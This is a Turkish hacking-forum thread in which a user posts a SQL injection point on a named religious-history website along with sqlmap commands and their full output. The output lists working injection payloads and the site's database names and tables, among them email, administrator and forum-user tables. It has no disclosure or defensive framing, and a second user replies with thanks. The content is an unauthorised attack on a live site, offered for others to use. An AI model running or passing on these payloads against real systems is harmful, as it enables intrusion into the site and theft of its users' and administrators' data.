1.                                                

bible-history sql inj and db dump

'Bug Researchers' forumunda KaliBot tarafından 23 Temmuz 2016 tarihinde açılan konu

  1. KaliBot

    KaliBot Albay

    Katılım:
    30 Haziran 2015
    Mesaj:
    539
    Beğeniler:
    45
    Ödül Puanları:
    12
    Web Sitesi:

    site:http://www.bible-history.com/
    sql:www.bible-history.com/subcat.php?id=2'

    sqlmap out:
    Kod:
    [email protected]:~# sqlmap -u http://www.bible-history.com/subcat.php?id=2%27a --dbs
             _
    ___ ___| |_____ ___ ___  {1.0.6.0#dev}
    |_ -| . | |     | .'| . |
    |___|_  |_|_|_|_|__,|  _|
          |_|           |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting at 14:18:32
    
    [14:18:32] [INFO] resuming back-end DBMS 'mysql'
    [14:18:32] [INFO] testing connection to the target URL
    [14:18:33] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
        Payload: id=-2825 OR 2565=2565#
    
        Type: error-based
        Title: MySQL OR error-based - WHERE or HAVING clause
        Payload: id=-9248 OR 1 GROUP BY CONCAT(0x7178707871,(SELECT (CASE WHEN (4943=4943) THEN 1 ELSE 0 END)),0x717a767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 time-based blind - Parameter replace
        Payload: id=(CASE WHEN (9191=9191) THEN SLEEP(5) ELSE 9191 END)
    
        Type: UNION query
        Title: MySQL UNION query (NULL) - 1 column
        Payload: id=-5652 UNION ALL SELECT CONCAT(0x7178707871,0x41445a684e6e77464273735070627279465867614874714643597453515a6f446548505577744467,0x717a767071)#
    ---
    [14:18:33] [INFO] the back-end DBMS is MySQL
    web application technology: PHP 5.5.35, Apache 2.4.18
    back-end DBMS: MySQL 5.0.12
    [14:18:33] [INFO] fetching database names
    [14:18:34] [INFO] the SQL query used returns 5 entries
    [14:18:34] [INFO] retrieved: information_schema
    [14:18:34] [INFO] retrieved: bible_glossary
    [14:18:34] [INFO] retrieved: bible_history
    [14:18:35] [INFO] retrieved: keywords
    [14:18:35] [INFO] retrieved: kidsdict
    available databases [5]:                                                                              
    [*] bible_glossary
    [*] bible_history
    [*] information_schema
    [*] keywords
    [*] kidsdict
    
    [14:18:35] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.bible-history.com'
    [email protected]:~# sqlmap -u http://www.bible-history.com/subcat.php?id=2%27a -D bible_history --tabless
             _
    ___ ___| |_____ ___ ___  {1.0.6.0#dev}
    |_ -| . | |     | .'| . |
    |___|_  |_|_|_|_|__,|  _|
          |_|           |_|   http://sqlmap.org
    
    Usage: python sqlmap [options]
    
    sqlmap: error: no such option: --tabless
    [email protected]:~# sqlmap -u http://www.bible-history.com/subcat.php?id=2%27a -D bible_history --tables         _
    ___ ___| |_____ ___ ___  {1.0.6.0#dev}
    |_ -| . | |     | .'| . |
    |___|_  |_|_|_|_|__,|  _|
          |_|           |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting at 14:19:01
    
    [14:19:01] [INFO] resuming back-end DBMS 'mysql'
    [14:19:01] [INFO] testing connection to the target URL
    [14:19:01] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
        Payload: id=-2825 OR 2565=2565#
    
        Type: error-based
        Title: MySQL OR error-based - WHERE or HAVING clause
        Payload: id=-9248 OR 1 GROUP BY CONCAT(0x7178707871,(SELECT (CASE WHEN (4943=4943) THEN 1 ELSE 0 END)),0x717a767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 time-based blind - Parameter replace
        Payload: id=(CASE WHEN (9191=9191) THEN SLEEP(5) ELSE 9191 END)
    
        Type: UNION query
        Title: MySQL UNION query (NULL) - 1 column
        Payload: id=-5652 UNION ALL SELECT CONCAT(0x7178707871,0x41445a684e6e77464273735070627279465867614874714643597453515a6f446548505577744467,0x717a767071)#
    ---
    [14:19:01] [INFO] the back-end DBMS is MySQL
    web application technology: PHP 5.5.35, Apache 2.4.18
    back-end DBMS: MySQL 5.0.12
    [14:19:01] [INFO] fetching tables for database: 'bible_history'
    [14:19:02] [INFO] the SQL query used returns 52 entries
    [14:19:02] [INFO] retrieved: Emails
    [14:19:02] [INFO] retrieved: administrators
    [14:19:03] [INFO] retrieved: bh_addform
    [14:19:03] [INFO] retrieved: bh_guestbook
    [14:19:03] [INFO] retrieved: bho_board_bans
    [14:19:03] [INFO] retrieved: bho_board_forums
    [14:19:04] [INFO] retrieved: bho_board_posts
    [14:19:04] [INFO] retrieved: bho_board_search
    [14:19:04] [INFO] retrieved: bho_board_topics
    [14:19:04] [INFO] retrieved: bho_board_users
    [14:19:05] [INFO] retrieved: bible_book
    [14:19:05] [INFO] retrieved: books
    [14:19:05] [INFO] retrieved: cat
    [14:19:05] [INFO] retrieved: categories
    [14:19:06] [INFO] retrieved: chapters
    [14:19:06] [INFO] retrieved: chapters1
    [14:19:06] [INFO] retrieved: commentary_jfb
    [14:19:06] [INFO] retrieved: eastons
    [14:19:07] [INFO] retrieved: guestbook
    [14:19:07] [INFO] retrieved: isbe
    [14:19:07] [INFO] retrieved: kingjames
    [14:19:07] [INFO] retrieved: kjv_verse
    [14:19:08] [INFO] retrieved: links
    [14:19:08] [INFO] retrieved: mathew
    [14:19:08] [INFO] retrieved: naves
    [14:19:08] [INFO] retrieved: naves_phrase
    [14:19:09] [INFO] retrieved: naves_verse
    [14:19:09] [INFO] retrieved: ob_book_abbreviation_lookup
    [14:19:09] [INFO] retrieved: outline_chapter
    [14:19:10] [INFO] retrieved: outline_major_section
    [14:19:10] [INFO] retrieved: questions
    [14:19:10] [INFO] retrieved: series
    [14:19:10] [INFO] retrieved: smiths
    [14:19:11] [INFO] retrieved: smiths_ref
    [14:19:11] [INFO] retrieved: sub
    [14:19:11] [INFO] retrieved: subjects
    [14:19:12] [INFO] retrieved: tbl_dictionary
    [14:19:12] [INFO] retrieved: tbl_fausset
    [14:19:12] [INFO] retrieved: tbl_gfd
    [14:19:12] [INFO] retrieved: tbl_hitchcock
    [14:19:13] [INFO] retrieved: tbl_hollman
    [14:19:13] [INFO] retrieved: tbl_ibhcategory
    [14:19:14] [INFO] retrieved: tbl_ibhsubcategory
    [14:19:14] [INFO] retrieved: tbl_image
    [14:19:14] [INFO] retrieved: tbl_isbe
    [14:19:15] [INFO] retrieved: tbl_sdas
    [14:19:15] [INFO] retrieved: tbl_the
    [14:19:15] [INFO] retrieved: tbl_tt
    [14:19:15] [INFO] retrieved: tbl_vcx
    [14:19:16] [INFO] retrieved: user_links
    [14:19:16] [INFO] retrieved: web_verse
    [14:19:16] [INFO] retrieved: web_verse_bak
    Database: bible_history                                                                               
    [52 tables]
    +-----------------------------+
    | Emails                      |
    | administrators              |
    | bh_addform                  |
    | bh_guestbook                |
    | bho_board_bans              |
    | bho_board_forums            |
    | bho_board_posts             |
    | bho_board_search            |
    | bho_board_topics            |
    | bho_board_users             |
    | bible_book                  |
    | books                       |
    | cat                         |
    | categories                  |
    | chapters                    |
    | chapters1                   |
    | commentary_jfb              |
    | eastons                     |
    | guestbook                   |
    | isbe                        |
    | kingjames                   |
    | kjv_verse                   |
    | links                       |
    | mathew                      |
    | naves                       |
    | naves_phrase                |
    | naves_verse                 |
    | ob_book_abbreviation_lookup |
    | outline_chapter             |
    | outline_major_section       |
    | questions                   |
    | series                      |
    | smiths                      |
    | smiths_ref                  |
    | sub                         |
    | subjects                    |
    | tbl_dictionary              |
    | tbl_fausset                 |
    | tbl_gfd                     |
    | tbl_hitchcock               |
    | tbl_hollman                 |
    | tbl_ibhcategory             |
    | tbl_ibhsubcategory          |
    | tbl_image                   |
    | tbl_isbe                    |
    | tbl_sdas                    |
    | tbl_the                     |
    | tbl_tt                      |
    | tbl_vcx                     |
    | user_links                  |
    | web_verse                   |
    | web_verse_bak               |
    +-----------------------------+
    
    [14:19:16] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.bible-history.com'
    
     
  2. Al-Farabi

    Al-Farabi Albay

    Katılım:
    16 Ocak 2016
    Mesaj:
    1,349
    Beğeniler:
    128
    Ödül Puanları:
    63
    Thx dude .
     

Bu Sayfayı Paylaş

Share